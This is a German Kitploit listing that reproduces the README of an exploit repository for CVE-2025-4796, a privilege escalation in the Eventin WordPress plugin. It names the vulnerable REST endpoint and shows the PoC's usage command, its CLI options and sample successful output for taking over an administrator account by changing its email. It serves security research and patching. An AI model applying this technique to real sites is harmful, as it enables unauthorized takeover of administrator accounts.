Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-4796 — Eventin <= 4.0.34 - Authentifizierte (Contributor+) Privilegienerweiterung über Benutzer-E-Mail-Änderung/Kontoübernahme | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-4796
Authentifizierung & AutorisierungPrivilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationLernen & Bildung
GitHubnxploited/cve-2025-4796

CVE-2025-4796

Eventin <= 4.0.34 - Authentifizierte (Contributor+) Privilegienerweiterung über Benutzer-E-Mail-Änderung/Kontoübernahme

Repository anzeigen
3vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-4796

Eventin <= 4.0.34 – Authentifizierte (Contributor+) Privilegieneskalation über E-Mail-Änderung/Kontoübernahme

🛡️ Eventin <= 4.0.34 – Authentifizierte (Contributor+) Privilegieneskalation (CVE-2025-4796)

📌 Übersicht

Dieses Repository dokumentiert eine Privilegieneskalations-Schwachstelle im Eventin-WordPress-Plugin (<= 4.0.34), die es einem authentifizierten Benutzer mit Contributor+-Berechtigungen ermöglicht, die E-Mail-Adressen beliebiger Benutzer über die Speaker-Update-API des Plugins zu ändern. Durch die Änderung der E-Mail-Adresse eines Administrators kann ein Angreifer eine Passwortzurücksetzung auslösen und so die Kontenübernahme erreichen.

  • Verwundbare Komponente: Eventin-WordPress-Plugin (Eventin\Speaker\Api\SpeakerController::update_item)

  • Betroffene Versionen: <= 4.0.34

  • CVE: CVE-2025-4796

  • CVSS: 8.8 (Hoch)

  • Aktive Installationen: 10.000+

⚠️ Details zur Schwachstelle

Eventin validiert die Identität oder Berechtigung des Aufrufers nicht ordnungsgemäß, bevor Speaker-/Benutzerdetails (insbesondere die E-Mail-Adresse) aktualisiert werden. Ein Angreifer, der als Contributor (oder höher) authentifiziert ist, kann die E-Mail-Adresse anderer Benutzer – einschließlich Administratoren – über den REST-Endpunkt des Plugins ändern:

  • PUT /wp-json/eventin/v2/speakers/<speaker_id>

Sobald die E-Mail-Adresse in eine vom Angreifer kontrollierte Adresse geändert wurde, kann der standardmäßige WordPress-Ablauf zur Passwortzurücksetzung genutzt werden, um das Konto zu übernehmen.

🧰 Skript (PoC)

Dateiname: CVE-2025-4796.py

Dieses Skript automatisiert die folgenden Schritte:

  1. Anmeldung an der Ziel-WordPress-Website mit den angegebenen Zugangsdaten.
  2. Extrahieren der erforderlichen X-WP-Nonce.
  3. Senden einer PUT-Anfrage an /wp-json/eventin/v2/speakers/<speaker_id>, um die E-Mail-Adresse des Speakers zu aktualisieren.
  4. Ausgeben und Formatieren der JSON-Antwort sowie einer professionellen Erfolgsmeldung.

Anforderungen:

  • Python 3.8+
  • requests

Installation:

root@kitploit:~
pip install requests

🚀 Verwendung

Führen Sie das Skript über die Befehlszeile aus:

root@kitploit:~
python CVE-2025-4796.py -u https://target.site -id 9 -email [email protected] -user contributor_user -pass contributor_password

Skript-Hilfe anzeigen:

root@kitploit:~
python CVE-2025-4796.py -h

📝 CLI-Optionen (Hilfe)

root@kitploit:~
usage: CVE-2025-4796.py [-h] -u URL -id SPEAKER_ID -email EMAIL -user USERNAME -pass PASSWORD

Exploit For: CVE-2025-4796 By: Nxploited

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress site URL
  -id, --speaker_id SPEAKER_ID
                        Enter the speaker ID for the user
  -email, --email EMAIL
                        Enter a new email address
  -user, --username USERNAME
                        Enter the username for the account to upgrade
  -pass, --password PASSWORD
                        Enter the password for the account to upgrade


✅ Beispiel für eine erfolgreiche Ausgabe

root@kitploit:~
[*] Please wait, exploitation starting ...
[*] Disabling SSL warnings ...
[*] Logging in to WordPress ...
[+] Logged in successfully.
[*] Extracting nonce value ...
[+] Nonce extracted: fc0ab7b983
[*] Exploiting and updating speaker info ...

[+] Exploitation in progress, please wait ...

[+] Exploitation successful.
[+] The account has been updated to Admin.
    Speaker ID   : 9
    Email        : [email protected]

[!] Please reset your password using the email: [email protected]

⚖️ Verantwortungsvolle Offenlegung & Haftungsausschluss

  • Dieses Repository wird für Sicherheitsforschung, Tests und Verteidigungszwecke bereitgestellt.
  • Verwenden Sie diese Techniken nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Genehmigung zum Testen haben.
  • Nicht autorisierte Ausnutzung von Schwachstellen ist illegal und unethisch.
  • Wenn Sie Website-Besitzer sind und glauben, dass Sie verwundbar sind, aktualisieren Sie Eventin auf die neueste Version oder wenden Sie die Patches des Anbieters sofort an.
  • Verwenden Sie diesen Code nur in autorisierten Umgebungen (Labor, vom Kunden genehmigter Penetrationstest oder mit ausdrücklicher Genehmigung).

🧾 Was das Skript tut (kurzgefasst)

  • Validiert Eingaben (URL, E-Mail) und normalisiert das URL-Schema.
  • Deaktiviert SSL-Warnungen (optional; wird verwendet, um Tests gegen selbstsignierte Entwicklungsinstanzen zu unterstützen).
  • Meldet sich mit den angegebenen WP-Zugangsdaten an und validiert die Anmeldung über Cookies.
  • Ruft die X-WP-Nonce von der Admin-Seite ab.
  • Sendet eine authentifizierte PUT-Anfrage, um die E-Mail-Adresse des Speakers zu aktualisieren.
  • Gibt die formatierte JSON-Antwort und eine abschließende, menschenlesbare Erfolgszusammenfassung aus.

👤 Credits

Von: Khaled Alenaz (Nxploited)
GitHub: https://github.com/Nxploited/

Tool herunterladen